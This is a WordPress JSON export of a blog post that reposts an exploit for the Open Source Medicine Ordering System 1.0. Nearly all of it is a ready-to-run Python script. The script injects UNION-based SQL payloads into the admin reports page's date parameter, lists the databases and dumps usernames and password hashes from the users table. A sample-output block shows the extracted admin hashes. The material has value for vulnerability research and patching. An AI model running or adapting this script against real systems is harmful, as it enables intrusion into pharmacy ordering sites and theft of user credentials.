{"id":56156,"date":"2024-04-08T20:59:51","date_gmt":"2024-04-08T16:59:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177985\/osmos10-sql.txt"},"modified":"2024-04-08T20:59:51","modified_gmt":"2024-04-08T16:59:51","slug":"open-source-medicine-ordering-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/open-source-medicine-ordering-system-1-0-sql-injection\/","title":{"rendered":"Open Source Medicine Ordering System 1.0 SQL Injection"},"content":{"rendered":"<p># Exploit Title : Open Source Medicine Ordering System v1.0 &#8211; SQLi<br \/># Author : Onur Karasaliho\u011flu<br \/># Date : 27\/02\/2024<br \/># Sample Usage<\/p>\n<p>% python3 omos_sqli_exploit.py https:\/\/target.com<br \/>Available Databases:<br \/>1. information_schema<br \/>2. omosdb<br \/>Please select a database to use (enter number): 2<br \/>You selected: omosdb<br \/>Extracted Admin Users Data:<br \/>1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin<br \/>2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith<br \/>&#8221;&#8217;<\/p>\n<p>import requests<br \/>import re<br \/>import sys<\/p>\n<p>def fetch_database_names(domain):<br \/>url = f&#8221;{domain}\/admin\/?page=reports&amp;date=2024-02-22&#8217;%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(&#8216;enforsec&#8217;,JSON_ARRAYAGG(CONCAT_WS(&#8216;,&#8217;,schema_name)),&#8217;enforsec&#8217;)%20FROM%20INFORMATION_SCHEMA.SCHEMATA&#8211;%20-&#8220;<\/p>\n<p>try:<br \/># HTTP request<br \/>response = requests.get(url)<br \/>response.raise_for_status() # exception for 4xx and 5xx requests<\/p>\n<p># data extraction<br \/>pattern = re.compile(r&#8217;enforsec\\[&#8220;(.*?)&#8221;\\]enforsec&#8217;)<br \/>extracted_data = pattern.search(response.text)<br \/>if extracted_data:<br \/>databases = extracted_data.group(1).split(&#8216;,&#8217;)<br \/>databases = [db.replace(&#8216;&#8221;&#8216;, &#8221;) for db in databases]<br \/>print(&#8220;Available Databases:&#8221;)<br \/>for i, db in enumerate(databases, start=1):<br \/>print(f&#8221;{i}. {db}&#8221;)<\/p>\n<p># users should select omos database<br \/>choice = int(input(&#8220;Please select a database to use (enter number): &#8220;))<br \/>if 0 &lt; choice &lt;= len(databases):<br \/>selected_db = databases[choice &#8211; 1]<br \/>print(f&#8221;You selected: {selected_db}&#8221;)<br \/>fetch_data(domain, selected_db)<br \/>else:<br \/>print(&#8220;Invalid selection.&#8221;)<br \/>else:<br \/>print(&#8220;No data extracted.&#8221;)<br \/>except requests.RequestException as e:<br \/>print(f&#8221;HTTP Request failed: {e}&#8221;)<\/p>\n<p>def fetch_data(domain, database_name):<br \/>url = f&#8221;{domain}\/admin\/?page=reports&amp;date=2024-02-22&#8217;%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(&#8216;enforsec&#8217;,JSON_ARRAYAGG(CONCAT_WS(&#8216;,&#8217;,`type`,firstname,lastname,middlename,password,username)),&#8217;enforsec&#8217;) FROM {database_name}.users&#8211; -&#8220;<\/p>\n<p>try:<br \/># HTTP request<br \/>response = requests.get(url)<br \/>response.raise_for_status() # exception for 4xx and 5xx requests<\/p>\n<p># data extraction<br \/>pattern = re.compile(r&#8217;enforsec\\[(.*?)\\]enforsec&#8217;)<br \/>extracted_data = pattern.search(response.text)<br \/>if extracted_data:<br \/>print(&#8220;Extracted Admin Users Data:&#8221;)<br \/>data = extracted_data.group(1)<br \/>rows = data.split(&#8216;&#8221;,&#8221;&#8216;)<br \/>for row in rows:<br \/>clean_row = row.replace(&#8216;&#8221;&#8216;, &#8221;)<br \/>user_details = clean_row.split(&#8216;,&#8217;)<br \/>print(&#8221; | &#8220;.join(user_details))<br \/>else:<br \/>print(&#8220;No data extracted.&#8221;)<br \/>except requests.RequestException as e:<br \/>print(f&#8221;HTTP Request failed: {e}&#8221;)<\/p>\n<p>def main():<br \/>if len(sys.argv) != 2:<br \/>print(&#8220;Usage: python3 omos_sqli_exploit.py &lt;domain&gt;&#8221;)<br \/>sys.exit(1)<\/p>\n<p>fetch_database_names(sys.argv[1])<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>main()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title : Open Source Medicine Ordering System v1.0 &#8211; SQLi# Author : Onur Karasaliho\u011flu# Date : 27\/02\/2024# Sample Usage % python3 omos_sqli_exploit.py https:\/\/target.comAvailable Databases:1. information_schema2. omosdbPlease select a database to use (enter number): 2You selected: omosdbExtracted Admin Users Data:1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin2 | John | Smith | &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56156","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56156"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56156\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}